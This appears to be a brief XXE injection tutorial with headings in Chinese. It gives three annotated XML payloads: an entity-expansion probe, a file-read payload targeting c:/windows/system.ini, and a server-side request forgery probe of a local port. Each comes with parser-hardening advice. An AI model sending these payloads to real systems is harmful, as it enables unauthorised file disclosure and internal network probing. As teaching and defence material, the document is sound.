目录
前提知识
XML基础,DTD基础
常见payload
测试漏洞
<?xml version="1.0"?>
<!-- Probe document: declares one internal general entity and references it once.
     If the application echoes "xiao" where the entity reference was sent, the parser
     accepted the DOCTYPE and expands entities. That alone does not show that
     external (SYSTEM) entities are resolved.
     Defence: configure the parser to reject DOCTYPE declarations on untrusted input
     (for example the Xerces/JAXP feature
     http://apache.org/xml/features/disallow-doctype-decl). -->
<!DOCTYPE test [
<!-- Internal entity: the replacement text is a literal string; no file or network access. -->
<!ENTITY coleak "xiao">
]>
<!-- The root element is "name" while the DOCTYPE names "test"; only a validating
     parser would object to the mismatch. -->
<name>&coleak;</name>
读取文件
<?xml version="1.0" encoding="utf-8"?>
<!-- External-entity (XXE) test case: the entity "file" has a SYSTEM identifier with a
     file: URI, so a parser that resolves external general entities substitutes the
     contents of that local file into the read element. The path is Windows-specific.
     Defence: reject DOCTYPE declarations, or disable external general entity
     resolution in the parser. An inbound document carrying a DOCTYPE with a SYSTEM
     identifier is also worth logging and rejecting at the application edge. -->
<!DOCTYPE read [
<!ENTITY file SYSTEM "file:///c:/windows/system.ini"> ]>
<read>&file;</read>
探测端口
<?xml version="1.0" encoding="utf-8"?>
<!-- External entity with an http: SYSTEM identifier: a parser that resolves it makes
     the parsing host issue an HTTP request to the given address (here loopback,
     port 8080), which is server-side request forgery through the XML parser.
     The page uses this to infer whether the port is open, presumably from
     differences in the error or response; confirm against the target parser.
     Defence: disable DTD and external entity processing, and block outbound fetches
     by the XML parser (with libxml2, the XML_PARSE_NONET option forbids network
     access). -->
<!DOCTYPE root[
<!-- Declares that "data" may hold any content; "root" itself has no declaration. -->
<!ELEMENT data ANY>
<!ENTITY XXE SYSTEM "http://127.0.0.1:8080">]>
<root>
<data>&XXE;</data>
</root>